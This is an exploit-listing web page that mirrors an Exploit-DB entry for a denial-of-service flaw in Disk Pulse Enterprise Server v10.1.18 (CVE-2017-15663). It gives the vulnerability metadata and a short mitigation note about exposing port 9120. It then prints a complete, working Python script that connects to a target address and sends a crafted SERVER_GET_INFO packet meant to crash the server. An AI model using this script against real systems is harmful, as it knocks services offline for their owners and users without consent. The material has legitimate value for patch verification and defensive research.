Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Disk Pulse Enterprise Server v10.1.18 - DOS - exploit.company
header-logo
Suggest Exploit
vendor:
Disk Pulse Enterprise Server
by:
Ahmad Mahfouz
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Disk Pulse Enterprise Server
Affected Version From: v10.1.18
Affected Version To: v10.1.18
Patch Exists: YES
Related CWE: CVE-2017-15663
CPE: a:disk_pulse:disk_pulse_enterprise_server:10.1.18
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
2017

Disk Pulse Enterprise Server v10.1.18 – DOS

Disk Pulse Enterprise Server v10.1.18 suffers from a denial of service vulnerability. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.

Mitigation:

Ensure that the control port is not exposed to the public internet and that only trusted users have access to the port.
Source

Exploit-DB raw data:

# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS,
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe
# Version: v10.1.18
# Category; Windows Remote DOS
# CVE: CVE-2017-15663
# Author Twitter: @eln1x
# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.

 

 

import socket
target = "192.168.72.231"
port = 9120
s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))

packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e" #evil
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"

s.send(packet)

try:

         data = s.recv(100)
         print data

except:

         print "K1LL3D"